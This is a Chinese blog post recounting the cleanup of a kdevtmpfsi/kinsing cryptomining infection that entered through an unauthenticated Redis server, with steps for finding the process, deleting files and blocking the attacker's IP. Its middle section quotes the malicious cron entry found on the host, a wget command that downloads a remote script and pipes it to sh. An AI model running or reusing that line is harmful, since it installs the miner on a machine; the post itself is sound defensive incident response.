記一次防毒工作--kdevtmpfsi挖礦病毒

一加六發表於2020-12-28

起因:redis配置不安全導致

參考文章:
https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.2.828c1848kuRv6p
1.漏洞描述
Redis 因配置不當存在未授權訪問漏洞,可以被攻擊者惡意利用。
在特定條件下,如果 Redis 以 root 身份執行,黑客可以給 root 賬號寫入 SSH 公鑰檔案,直接通過 SSH 登入受害伺服器,從而獲取伺服器許可權和資料。一旦入侵成功,攻擊者可直接新增賬號用於 SSH 遠端登入控制伺服器,給使用者的 Redis 執行環境以及 Linux 主機帶來安全風險,如刪除、洩露或加密重要資料,引發勒索事件等。
2.受影響範圍
在 Redis 客戶端,嘗試無賬號登入 Redis:
root@kali:~# redis-cli -h 10.16.10.2
redis 10.16.10.2:6379> keys *

  1. “1”`
    從登入結果可以看出,該 Redis 服務對公網開放,且未啟用認證。

與病毒鬥爭

參考文章:
https://www.cnblogs.com/llody/p/12133372.html
1、# top
檢視cpu佔用情況,找到佔用cpu的程式 最後是 kdevtmpfsi
2、# netstat -natp
根據上面的程式名檢視與內網的 tcp 連結異常 ,看到陌生ip,查出為國外ip,估計主機被人種後門了
3、crontab -l
此時,挖礦指令碼大概率定時在你的crontab裡面。

發現異常定時任務,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1 立刻刪除

4、kill程式
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
Kill - 9 pid
5、刪檔案
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing 記得這個守護程式的檔案也要刪掉,找不到的話,也可以用這個命令
find / -name kdevtmpfsi
find / -name kinsing
檢視是否有相關的木馬定時任務在執行 有的話刪掉再重啟下crontab
Cd /var/spool/cron

由於直接是redis引起的,病毒檔案多半是在redis資料夾裡,全刪掉!
在此長個記性,軟體安裝一定要單獨分出資料夾,要不不知道從哪刪除。
6、封禁ip
在tcpd伺服器配置中封禁
Vi /etc/hosts.deny
這是它入侵主機放的眼,刪除
在這裡插入圖片描述

改成如下內容
在這裡插入圖片描述

在防火牆禁止ip訪問
封禁IP:

iptables -I INPUT -s 195.3.146.118 -j DROP

直接服務配置nginx.conf
封禁單個IP
deny 195.3.146.118;
#封整個段即從123.0.0.1到123.255.255.254的命令
deny 123.0.0.0/8
#封IP段即從123.45.0.1到123.45.255.254的命令
deny 124.45.0.0/16
#封IP段即從123.45.6.1到123.45.6.254的命令是
deny 123.45.6.0/24
重啟nginx 服務 ./nginx -s reload

至此防毒完畢

相關文章